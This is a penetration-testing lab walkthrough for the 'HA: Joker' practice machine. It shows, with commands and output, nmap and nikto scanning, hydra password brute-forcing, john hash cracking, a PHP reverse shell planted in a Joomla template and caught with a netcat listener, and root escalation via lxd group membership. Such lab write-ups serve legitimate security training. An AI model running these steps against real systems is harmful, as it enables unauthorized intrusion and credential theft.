We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.
1.Reconnaisance
1.1 Nmap
Using nmap to scan and identify open ports and services
nmap -Pn -A -oA nmap.initail 10.10.26.109
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 09:56 IST
Nmap scan report for 10.10.26.109
Host is up (0.22s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 200.22 ms 10.11.0.1
2 201.05 ms 10.10.26.109
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.40 seconds
We find 3 open ports. 22, 80 and 8080 running ssh and 2 web servers respectively
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"
We get some potential usernames; Batman and Joker
Reading the contents of secret.txt, we find some keywords hinting to 100 words of rockyout.txt for password brute-forcing
Saving the potential usernames and some of its iterations to user.txt and first 100 words and last 100 words of rockyou to first_100_pass.txt and last_100_pass.txt, respectively.
Using the potential credential lists and Hydra to brute-force the login credentials at port 8080
hydra -L user.txt -P first_100_pass.txt http-get://10.10.26.109:8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-01 10:22:52
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 600 login tries (l:6/p:100), ~38 tries per task
[DATA] attacking http-get://10.10.26.109:8080/
[8080][http-get] host: 10.10.26.109 login: joker password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-01 10:23:20
We get the credential joker : hannah
:8080
Logging in to :8080 using the obtained credentials
We find a basic joomla template
2.3 Nikto
Scanning the website for potential vulnerabilities and directories using nikto and passing in the id:password
nikto -h http://10.10.26.109:8080/ -id joker:hannah
- Nikto v2.1.6
----------------------------------------------------------------------
+ Target IP: 10.10.26.109
+ Target Hostname: 10.10.26.109
+ Target Port: 8080
+ Start Time: 2022-04-01 10:27:18 (GMT5.5)
----------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ / - Requires Authentication for realm ' Please enter the password.'
+ Successfully authenticated to realm ' Please enter the password.' with user-supplied credentials.
line: /administrator/
+ "robots.txt" contains 14 entries which should be manually viewed.
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ /backup.zip: Potentially interesting backup/cert file found.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting.
+ OSVDB-3092: /bin/: This might be interesting.
+ OSVDB-3092: /includes/: This might be interesting.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3092: /README: README file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2022-04-01 10:46:51 (GMT5.5) (1173 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We get two interesting paths /robots.txt and /backup.zip/backup.zip found
/robots.txt
Usually robots.txt is used to prevent search engine indexing. We can find some more interesting directories through this./administrator looks promising
/backup.zip
We can download the backup.zip file, but it is password protected
Unziping backup.zip using the password hannah, we get two directories, db and site.This is similar to the directory structure found inside the victim machine.
Viewing joomla.sql in the db directory, we get some potential usernames and password hash.
john --wordlist=/usr/share/wordlists/rockyou.txt pass_john.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234 (?)
1g 0:00:00:08 DONE (2022-04-01 11:21) 0.1128g/s 115.8p/s 115.8c/s 115.8C/s cassandra..bulldogs
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show pass_john.txt
?:abcd1234
We get the credentials admin : abcd1234 which can be used to login to the /administrator to get admin access to the joomla CMS.
3.Gaining Access
3.1 PHP-Reverse Shell
Uploading php-reverse shell from /usr/share/webshells/php/php-reverse-shell.php in index.php in template "beez3".(Change the ip to tun0 ip).
Save the file and run the reverse-shell by clicking on template-preview
Start a netcat listener on the attacker system; capture and stabilize the shell
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.7.240] 35458
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
21:52:14 up 42 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
Using the id command, we find that the user www-data is a part of the group lxd
www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
4. Privilege Escalation
4.1 LxD Privilege Escalation
Linux Container (LXC) are often considered as a lightweight virtualization technology .Linux daemon (LXD) is the lightweight container hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before.
In order to take escalate the root privilege of the machine you have to create an image for lxd thus you need to
Download build-alpine to your attacking machine and transfer the image to the host
Import the lxd image to the target, initialize it in a new container and mount it to the /root directory
moving to the /mnt/root directory where we mounted our target and finding the final.txt flag
cd /mnt/root
/mnt/root ls
ls
bin lib root usr
boot lib64 run var
dev lost+found sbin vmlinuz
etc media srv vmlinuz.old
home mnt swapfile
initrd.img opt sys
initrd.img.old proc tmp
/mnt/root cd root
/mnt/root/root ls
final.txt
/mnt/root/root cat final.txt
A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. You can read more about it .
Cloning the alpine image from github repository and starting an http server to transfer it to the target.
